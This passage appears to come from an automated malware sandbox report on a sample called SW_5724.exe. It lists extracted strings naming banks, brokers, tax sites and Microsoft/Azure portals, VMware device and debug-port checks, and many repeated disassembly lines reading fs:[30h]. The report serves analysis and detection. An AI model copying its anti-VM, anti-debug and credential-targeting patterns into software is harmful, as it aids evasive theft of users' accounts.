                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 174EBI30.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 174EBI30.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 174EBI30.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 174EBI30.10.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 174EBI30.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.2740853833.0000016C6E72C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 174EBI30.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: BmUrsTIvMw.exe, 0000000B.00000002.4515198457.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                Source: 174EBI30.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 174EBI30.10.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: SW_5724.exe, 00000000.00000002.2079014451.0000000000C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 174EBI30.10.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 174EBI30.10.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 174EBI30.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 174EBI30.10.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 174EBI30.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 174EBI30.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E rdtsc 6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00417913 LdrLoadDll,6_2_00417913
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A90185 mov eax, dword ptr fs:[00000030h]6_2_01A90185
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4180 mov eax, dword ptr fs:[00000030h]6_2_01AF4180
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4180 mov eax, dword ptr fs:[00000030h]6_2_01AF4180
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD019F mov eax, dword ptr fs:[00000030h]6_2_01AD019F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD019F mov eax, dword ptr fs:[00000030h]6_2_01AD019F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD019F mov eax, dword ptr fs:[00000030h]6_2_01AD019F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD019F mov eax, dword ptr fs:[00000030h]6_2_01AD019F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A197 mov eax, dword ptr fs:[00000030h]6_2_01A4A197
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A197 mov eax, dword ptr fs:[00000030h]6_2_01A4A197
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A197 mov eax, dword ptr fs:[00000030h]6_2_01A4A197
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0C188 mov eax, dword ptr fs:[00000030h]6_2_01B0C188
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0C188 mov eax, dword ptr fs:[00000030h]6_2_01B0C188
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A801F8 mov eax, dword ptr fs:[00000030h]6_2_01A801F8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B261E5 mov eax, dword ptr fs:[00000030h]6_2_01B261E5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B161C3 mov eax, dword ptr fs:[00000030h]6_2_01B161C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B161C3 mov eax, dword ptr fs:[00000030h]6_2_01B161C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE1D0 mov eax, dword ptr fs:[00000030h]6_2_01ACE1D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE1D0 mov eax, dword ptr fs:[00000030h]6_2_01ACE1D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE1D0 mov ecx, dword ptr fs:[00000030h]6_2_01ACE1D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE1D0 mov eax, dword ptr fs:[00000030h]6_2_01ACE1D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE1D0 mov eax, dword ptr fs:[00000030h]6_2_01ACE1D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80124 mov eax, dword ptr fs:[00000030h]6_2_01A80124
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov ecx, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov ecx, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov ecx, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov eax, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE10E mov ecx, dword ptr fs:[00000030h]6_2_01AFE10E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B10115 mov eax, dword ptr fs:[00000030h]6_2_01B10115
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFA118 mov ecx, dword ptr fs:[00000030h]6_2_01AFA118
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFA118 mov eax, dword ptr fs:[00000030h]6_2_01AFA118
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFA118 mov eax, dword ptr fs:[00000030h]6_2_01AFA118
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFA118 mov eax, dword ptr fs:[00000030h]6_2_01AFA118
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24164 mov eax, dword ptr fs:[00000030h]6_2_01B24164
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24164 mov eax, dword ptr fs:[00000030h]6_2_01B24164
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE4144 mov eax, dword ptr fs:[00000030h]6_2_01AE4144
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE4144 mov eax, dword ptr fs:[00000030h]6_2_01AE4144
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE4144 mov ecx, dword ptr fs:[00000030h]6_2_01AE4144
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE4144 mov eax, dword ptr fs:[00000030h]6_2_01AE4144
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE4144 mov eax, dword ptr fs:[00000030h]6_2_01AE4144
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A56154 mov eax, dword ptr fs:[00000030h]6_2_01A56154
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A56154 mov eax, dword ptr fs:[00000030h]6_2_01A56154
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C156 mov eax, dword ptr fs:[00000030h]6_2_01A4C156
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE8158 mov eax, dword ptr fs:[00000030h]6_2_01AE8158
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A480A0 mov eax, dword ptr fs:[00000030h]6_2_01A480A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE80A8 mov eax, dword ptr fs:[00000030h]6_2_01AE80A8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B160B8 mov eax, dword ptr fs:[00000030h]6_2_01B160B8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B160B8 mov ecx, dword ptr fs:[00000030h]6_2_01B160B8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5208A mov eax, dword ptr fs:[00000030h]6_2_01A5208A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A0E3 mov ecx, dword ptr fs:[00000030h]6_2_01A4A0E3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A580E9 mov eax, dword ptr fs:[00000030h]6_2_01A580E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD60E0 mov eax, dword ptr fs:[00000030h]6_2_01AD60E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C0F0 mov eax, dword ptr fs:[00000030h]6_2_01A4C0F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A920F0 mov ecx, dword ptr fs:[00000030h]6_2_01A920F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD20DE mov eax, dword ptr fs:[00000030h]6_2_01AD20DE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A020 mov eax, dword ptr fs:[00000030h]6_2_01A4A020
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C020 mov eax, dword ptr fs:[00000030h]6_2_01A4C020
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6030 mov eax, dword ptr fs:[00000030h]6_2_01AE6030
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD4000 mov ecx, dword ptr fs:[00000030h]6_2_01AD4000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF2000 mov eax, dword ptr fs:[00000030h]6_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E016 mov eax, dword ptr fs:[00000030h]6_2_01A6E016
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E016 mov eax, dword ptr fs:[00000030h]6_2_01A6E016
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E016 mov eax, dword ptr fs:[00000030h]6_2_01A6E016
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E016 mov eax, dword ptr fs:[00000030h]6_2_01A6E016
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7C073 mov eax, dword ptr fs:[00000030h]6_2_01A7C073
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A52050 mov eax, dword ptr fs:[00000030h]6_2_01A52050
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6050 mov eax, dword ptr fs:[00000030h]6_2_01AD6050
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7438F mov eax, dword ptr fs:[00000030h]6_2_01A7438F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7438F mov eax, dword ptr fs:[00000030h]6_2_01A7438F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E388 mov eax, dword ptr fs:[00000030h]6_2_01A4E388
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E388 mov eax, dword ptr fs:[00000030h]6_2_01A4E388
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E388 mov eax, dword ptr fs:[00000030h]6_2_01A4E388
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48397 mov eax, dword ptr fs:[00000030h]6_2_01A48397
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48397 mov eax, dword ptr fs:[00000030h]6_2_01A48397
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48397 mov eax, dword ptr fs:[00000030h]6_2_01A48397
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A603E9 mov eax, dword ptr fs:[00000030h]6_2_01A603E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E3F0 mov eax, dword ptr fs:[00000030h]6_2_01A6E3F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E3F0 mov eax, dword ptr fs:[00000030h]6_2_01A6E3F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E3F0 mov eax, dword ptr fs:[00000030h]6_2_01A6E3F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A863FF mov eax, dword ptr fs:[00000030h]6_2_01A863FF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A3C0 mov eax, dword ptr fs:[00000030h]6_2_01A5A3C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A583C0 mov eax, dword ptr fs:[00000030h]6_2_01A583C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A583C0 mov eax, dword ptr fs:[00000030h]6_2_01A583C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A583C0 mov eax, dword ptr fs:[00000030h]6_2_01A583C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A583C0 mov eax, dword ptr fs:[00000030h]6_2_01A583C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD63C0 mov eax, dword ptr fs:[00000030h]6_2_01AD63C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE3DB mov eax, dword ptr fs:[00000030h]6_2_01AFE3DB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE3DB mov eax, dword ptr fs:[00000030h]6_2_01AFE3DB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE3DB mov ecx, dword ptr fs:[00000030h]6_2_01AFE3DB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFE3DB mov eax, dword ptr fs:[00000030h]6_2_01AFE3DB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF43D4 mov eax, dword ptr fs:[00000030h]6_2_01AF43D4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF43D4 mov eax, dword ptr fs:[00000030h]6_2_01AF43D4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0C3CD mov eax, dword ptr fs:[00000030h]6_2_01B0C3CD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B28324 mov eax, dword ptr fs:[00000030h]6_2_01B28324
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B28324 mov ecx, dword ptr fs:[00000030h]6_2_01B28324
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B28324 mov eax, dword ptr fs:[00000030h]6_2_01B28324
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B28324 mov eax, dword ptr fs:[00000030h]6_2_01B28324
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A30B mov eax, dword ptr fs:[00000030h]6_2_01A8A30B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A30B mov eax, dword ptr fs:[00000030h]6_2_01A8A30B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A30B mov eax, dword ptr fs:[00000030h]6_2_01A8A30B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C310 mov ecx, dword ptr fs:[00000030h]6_2_01A4C310
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70310 mov ecx, dword ptr fs:[00000030h]6_2_01A70310
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF437C mov eax, dword ptr fs:[00000030h]6_2_01AF437C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A352 mov eax, dword ptr fs:[00000030h]6_2_01B1A352
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD2349 mov eax, dword ptr fs:[00000030h]6_2_01AD2349
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov eax, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov eax, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov eax, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov ecx, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov eax, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD035C mov eax, dword ptr fs:[00000030h]6_2_01AD035C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B2634F mov eax, dword ptr fs:[00000030h]6_2_01B2634F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF8350 mov ecx, dword ptr fs:[00000030h]6_2_01AF8350
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A602A0 mov eax, dword ptr fs:[00000030h]6_2_01A602A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A602A0 mov eax, dword ptr fs:[00000030h]6_2_01A602A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov eax, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov ecx, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov eax, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov eax, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov eax, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE62A0 mov eax, dword ptr fs:[00000030h]6_2_01AE62A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E284 mov eax, dword ptr fs:[00000030h]6_2_01A8E284
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E284 mov eax, dword ptr fs:[00000030h]6_2_01A8E284
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD0283 mov eax, dword ptr fs:[00000030h]6_2_01AD0283
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD0283 mov eax, dword ptr fs:[00000030h]6_2_01AD0283
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD0283 mov eax, dword ptr fs:[00000030h]6_2_01AD0283
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A602E1 mov eax, dword ptr fs:[00000030h]6_2_01A602E1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A602E1 mov eax, dword ptr fs:[00000030h]6_2_01A602E1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A602E1 mov eax, dword ptr fs:[00000030h]6_2_01A602E1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B262D6 mov eax, dword ptr fs:[00000030h]6_2_01B262D6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A2C3 mov eax, dword ptr fs:[00000030h]6_2_01A5A2C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A2C3 mov eax, dword ptr fs:[00000030h]6_2_01A5A2C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A2C3 mov eax, dword ptr fs:[00000030h]6_2_01A5A2C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A2C3 mov eax, dword ptr fs:[00000030h]6_2_01A5A2C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A2C3 mov eax, dword ptr fs:[00000030h]6_2_01A5A2C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4823B mov eax, dword ptr fs:[00000030h]6_2_01A4823B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00274 mov eax, dword ptr fs:[00000030h]6_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54260 mov eax, dword ptr fs:[00000030h]6_2_01A54260
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54260 mov eax, dword ptr fs:[00000030h]6_2_01A54260
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54260 mov eax, dword ptr fs:[00000030h]6_2_01A54260
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4826B mov eax, dword ptr fs:[00000030h]6_2_01A4826B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A250 mov eax, dword ptr fs:[00000030h]6_2_01B0A250
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A250 mov eax, dword ptr fs:[00000030h]6_2_01B0A250
